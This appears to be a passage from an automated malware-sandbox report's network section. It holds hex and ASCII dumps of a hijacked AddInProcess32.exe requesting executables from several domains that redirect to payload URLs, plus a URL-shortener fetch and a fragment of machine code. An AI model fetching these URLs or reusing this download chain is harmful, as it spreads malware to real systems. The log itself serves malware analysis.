                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: 8f fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 90 39 40 00 8b ff a0 39 40 00 a8 39 40 00 b4 39 40 00 c8 39 40 00 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8a 46 01 88 47 01 8b 45 08 5e 5f c9 c3 8d 49 00 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 8d 74 31 fc 8d 7c 39 fc f7 c7 03 00 00 00 75 24 c1 e9 02 83 e2 03 83 f9 08 72 0d fd f3 a5 fc ff 24 95 2c 3b 40 00 8b ff f7 d9 ff 24 8d dc 3a 40 00 8d 49 00 8b c7 ba 03 00 00 00 83 f9 04 72 0c 83 e0 03 2b c8 ff 24 85 30 3a 40 00 ff 24 8d 2c 3b 40 00 90 40 3a 40 00 64 3a 40 00 8c 3a 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 2c 3b 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83
                                                                                                                                                                                                                                                            Data Ascii: $9@9@9@9@9@E^_E^_FGE^_IFGFGE^_t1|9u$r$,;@$:@Ir+$0:@$,;@@:@d:@:@F#Gr$,;@IF#GFG


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            25192.168.2.555591104.21.32.14244344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC79OUTGET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: shipofdestiny.com
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC701INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:57 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=D17gP%2FXzoeFGM9PaB7Luiz5b%2BZ0kGayE6Mi7WwtqCo7Cv5lFnWLOdO0CBqMmEYpvdETkmhYvkCmAKVb8aURbVy2s%2BuRLhT374E5aMvSqwkjFTpAztJJrgHkEjNUZklGu5nxR4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628201f197069e3-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC135INData Raw: 38 31 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 61 77 79 65 72 62 75 79 65 72 2e 6f 72 67 2f 32 36 62 36 32 36 66 65 61 32 39 30 31 35 61 39 66 32 34 65 30 37 61 30 38 66 61 30 31 31 65 34 2f 62 61 66 31 34 37 37 38 63 32 34 36 65 31 35 35 35 30 36 34 35 65 33 30 62 61 37 38 63 65 31 63 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 81<a href="https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe">Temporary Redirect</a>.
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            26192.168.2.555592172.67.200.21944344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC38OUTGET /ppg8x HTTP/1.1
                                                                                                                                                                                                                                                            Host: sty.ink
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1188INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:57 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-cache, private
                                                                                                                                                                                                                                                            Set-Cookie: XSRF-TOKEN=eyJpdiI6Ik40Nklxa2kxbDduV2ZkMXpYbmsrUFE9PSIsInZhbHVlIjoieFdNcGFaWlV1OTUyQmlub2RzQkhwWTNkVjAwM0YrUTRFVW5DSmwyVDVtNzVGc2xzd2R6Z2JtK0RiVVNmc3FBeGNGYUlZZGEwbVg1QWpTZmZwcGttVGtxbktEakhpM24wZEhxdmdoSHR5a1ZSL1lIMWovQVVhZXNpMTZ2S0c0dEMiLCJtYWMiOiIzZjJjY2Y1MTJiOTU4N2U4MzQyN2FkNGM0YjUzZmRiMjMzOGM0ZWJlZmE3YjZjZDQ1N2YwNzg5Yjg0NjUzMWY0IiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:30:57 GMT; Max-Age=7200; path=/; secure
                                                                                                                                                                                                                                                            set-cookie: shortiny_session=eyJpdiI6InZQT2xvOFp6L0J0b0hZQWJnNWlKWXc9PSIsInZhbHVlIjoieGhxb2NsR21xTlRqbThyUjRVRTIxWHhYSWNXOGI1NXZSNngvUThlcExybE1FNExwZUxBVWh0SVltWFRTaWJXTE5YNElCSi9BUDNqb3ZnL1I5aGtNWDZMSE80Uk5Da0tLVUtEUGYxQy9vOUxNWWZyVkpwSDRLVVJkOUlRb2hzVTAiLCJtYWMiOiIzNWNhMDFiZGMzNTVlMThlYjNkNTAwNTZhYzEwZDRlZTA5NThhM2Y0MGU0YWZhNDFhM2U5YTI4NjQ5NTVkM2FkIiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:30:57 GMT; Max-Age=7200; path=/; httponly
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=15768000
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC389INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 46 61 4e 36 76 72 64 4e 78 74 6c 74 67 65 6f 71 50 74 4f 74 6b 64 30 4f 79 34 53 79 46 4a 55 77 75 6e 67 73 45 6c 67 50 47 55 39 62 7a 45 74 44 78 68 4a 67 5a 63 6c 34 69 53 45 77 4a 63 59 36 33 41 41 36 37 69 33 68 75 53 48 44 52 56 59 25 32 46 37 5a 57 67 49 63 63 66 4c 39 76 6a 76 72 58 37 76 68 70 5a 57 39 6f 36 52 79 63 65 38 42 76 6e 36 4d 55 33 64 32 50 64 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f
                                                                                                                                                                                                                                                            Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FaN6vrdNxtltgeoqPtOtkd0Oy4SyFJUwungsElgPGU9bzEtDxhJgZcl4iSEwJcY63AA67i3huSHDRVY%2F7ZWgIccfL9vjvrX7vhpZW9o6Ryce8Bvn6MU3d2Pd"}],"group":"cf-nel","max_age":604800}NEL: {"success_
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: 65 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 68 2d 31 30 30 20 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 2d 73 6d 6f 6f 74 68 20 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 43 53 52 46 20 54 6f 6b 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22
                                                                                                                                                                                                                                                            Data Ascii: e1b<!DOCTYPE html><html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> ... CSRF Token --> <meta name="csrf-token" content="
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 68 6f 72 74 69 6e 79 2e 63 6f 6d 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 47 6f 20 62 61 63 6b 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 66 6f 6f 74 65 72 20 69 64 3d 22 66 6f 6f 74 65 72 22 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 20 62 67 2d 62 61 73 65 2d 30 20 64 2d 70 72 69 6e 74 2d 6e 6f 6e 65 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72
                                                                                                                                                                                                                                                            Data Ascii: <a href="https://shortiny.com" class="btn btn-primary">Go back</a> </div> </div> </div> </div></div> <footer id="footer" class="footer bg-base-0 d-print-none"> <div class="container
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC880INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 69 78 65 64 2d 62 6f 74 74 6f 6d 20 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 2d 6e 6f 6e 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 61 6c 69 67 6e 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 72 64 65 72 2d 30 20 6d 74 2d 30 20 6d 72 2d 33 20 6d 62 2d 33 20 6d 6c 2d 33 20 70 2d 32 20 72 6f 75 6e 64 65 64 20 63 6f 6f 6b 69 65 2d 62 61 6e 6e 65 72 20
                                                                                                                                                                                                                                                            Data Ascii: </div> </div> </div> <div class="fixed-bottom pointer-events-none"> <div class="d-flex justify-content-center align-items-center"> <div class="border-0 mt-0 mr-3 mb-3 ml-3 p-2 rounded cookie-banner
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 1
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            27192.168.2.555593172.67.178.18344344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC74OUTGET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: namemail.org
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC693INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:57 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QNhHGmBJhiBFiU1%2FscEQucKA%2F25%2B0IFC6muqhWw1aB%2F%2FwjQhLVS1q63FkOlZT30LEdqN2UejyHv1Wx2BoCuO4IpGseuoc0eUMCr7oKTCzU05hPxH9%2Bv9RezDgFjkZ88%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628201fa9750ad5-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC131INData Raw: 37 64 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 74 74 72 61 64 65 2e 6f 72 67 2f 32 36 62 36 32 36 66 65 61 32 39 30 31 35 61 39 66 32 34 65 30 37 61 30 38 66 61 30 31 31 65 34 2f 36 37 37 39 64 38 39 62 37 61 33 36 38 66 34 66 33 66 33 34 30 62 35 30 61 39 64 31 38 64 37 31 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 7d<a href="https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe">Temporary Redirect</a>.
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            28192.168.2.555597104.21.32.14244344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC79OUTGET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: shipofdestiny.com
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC705INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:57 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LkYgLdfctpTx4Ksah3W3T7bzYXEheqXWr9%2B8I5PwsObcp%2BkMZrt5Hh0iFTBWiHg%2Bw2MzheguONh9ONyJXuGOQxahnfKFDugHOnDqWm%2FpCXTNci4CCn3AhY6A%2FNKEobHMZMzIYA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628201fceae0add-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC135INData Raw: 38 31 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 61 77 79 65 72 62 75 79 65 72 2e 6f 72 67 2f 32 36 62 36 32 36 66 65 61 32 39 30 31 35 61 39 66 32 34 65 30 37 61 30 38 66 61 30 31 31 65 34 2f 62 61 66 31 34 37 37 38 63 32 34 36 65 31 35 35 35 30 36 34 35 65 33 30 62 61 37 38 63 65 31 63 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 81<a href="https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe">Temporary Redirect</a>.
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            29192.168.2.555599172.67.178.18344344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC74OUTGET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: namemail.org
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC687INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:57 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=liFLCiAWd0sLOQvTs%2FAHWkmuNQt1y9AZyGFnC9PyqjK3TiVQAPXCwgR9k50vWChhwFCTTPhZol8pZIu9vF5a2OVy%2FsNGrkwSqKQ2xSI1UC7%2BXDhDnKHUxVOkXxYPRFk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628201fcea809f5-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC131INData Raw: 37 64 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 74 74 72 61 64 65 2e 6f 72 67 2f 32 36 62 36 32 36 66 65 61 32 39 30 31 35 61 39 66 32 34 65 30 37 61 30 38 66 61 30 31 31 65 34 2f 36 37 37 39 64 38 39 62 37 61 33 36 38 66 34 66 33 66 33 34 30 62 35 30 61 39 64 31 38 64 37 31 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 7d<a href="https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe">Temporary Redirect</a>.
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            30192.168.2.555598172.67.200.21944344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC38OUTGET /ppg8x HTTP/1.1
                                                                                                                                                                                                                                                            Host: sty.ink
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1188INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:57 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-cache, private
                                                                                                                                                                                                                                                            Set-Cookie: XSRF-TOKEN=eyJpdiI6IjN4TmxFVUNjQmxNNHIxVm9iNHpYbkE9PSIsInZhbHVlIjoiSjhtM25aeUJ3Y0lqbks1RWNoUU5uMGROV0F4RVVoTlNHa3ZFcHd4dnhYMlNFWE9KQU9ubDBZNERyMDdXRzJUb2hSWjRYOUZSZnBnVTBnTlN0STRRQ3JUdUVTRDNNcSsxRXk5MmNQcXNVWmxrSjNZbXdHTmtnaHg0RHdyQ0hCNW4iLCJtYWMiOiIzNDI1MmRmZDljMzk2N2RkY2IzOTVjZWZlODNkY2QzY2M3ZTJiODY1YjRmOTZjMDRjNDYxODY2YjllYWY4MzYzIiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:30:57 GMT; Max-Age=7200; path=/; secure
                                                                                                                                                                                                                                                            set-cookie: shortiny_session=eyJpdiI6IjVNUmlmWUJMOXFYWHZncm41Y1BuNUE9PSIsInZhbHVlIjoiamR3b2RlUG9QSWcybWwwSmU5NXVDdFBIeDhzVUpxdmx2NHppdCszcUxhc2dFWWtQOE9Hck55SWJyZ1hBZFBrNGVBV29sQzZBQmdBZ0IyYlJES3QvYnd2VHNsR3JFYXFra0w4OEFlV0psZm8yZkNoTFJEZWlVT1EwU3dENUl6RHQiLCJtYWMiOiIyN2NmY2U5MGUyNTc1NWVkMmFkNTYyNjlkZDVkMDUxMjBhY2M4M2YxYjRkNDI3YmI2ZDRhZWNmODQ2MGYwYjdjIiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:30:57 GMT; Max-Age=7200; path=/; httponly
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=15768000
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC395INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 43 65 63 4e 52 63 6d 30 66 30 78 63 4e 55 55 53 50 67 4b 47 33 47 78 6d 74 25 32 46 37 6f 4a 55 61 63 51 4f 44 25 32 46 34 4d 41 45 73 4c 64 30 51 6e 54 47 73 50 70 46 58 51 53 25 32 46 36 76 4e 70 50 43 57 52 6a 31 76 51 61 51 46 75 75 56 75 75 69 30 51 4d 63 46 75 74 36 35 4a 58 66 64 76 78 48 77 57 36 65 41 43 41 47 6b 50 53 6c 6b 37 77 4a 67 44 62 4b 25 32 46 6d 42 61 55 39 55 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75
                                                                                                                                                                                                                                                            Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CecNRcm0f0xcNUUSPgKG3Gxmt%2F7oJUacQOD%2F4MAEsLd0QnTGsPpFXQS%2F6vNpPCWRj1vQaQFuuVuui0QMcFut65JXfdvxHwW6eACAGkPSlk7wJgDbK%2FmBaU9U"}],"group":"cf-nel","max_age":604800}NEL: {"su
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: 65 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 68 2d 31 30 30 20 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 2d 73 6d 6f 6f 74 68 20 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 43 53 52 46 20 54 6f 6b 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22
                                                                                                                                                                                                                                                            Data Ascii: e1b<!DOCTYPE html><html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> ... CSRF Token --> <meta name="csrf-token" content="
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 68 6f 72 74 69 6e 79 2e 63 6f 6d 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 47 6f 20 62 61 63 6b 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 66 6f 6f 74 65 72 20 69 64 3d 22 66 6f 6f 74 65 72 22 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 20 62 67 2d 62 61 73 65 2d 30 20 64 2d 70 72 69 6e 74 2d 6e 6f 6e 65 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72
                                                                                                                                                                                                                                                            Data Ascii: <a href="https://shortiny.com" class="btn btn-primary">Go back</a> </div> </div> </div> </div></div> <footer id="footer" class="footer bg-base-0 d-print-none"> <div class="container
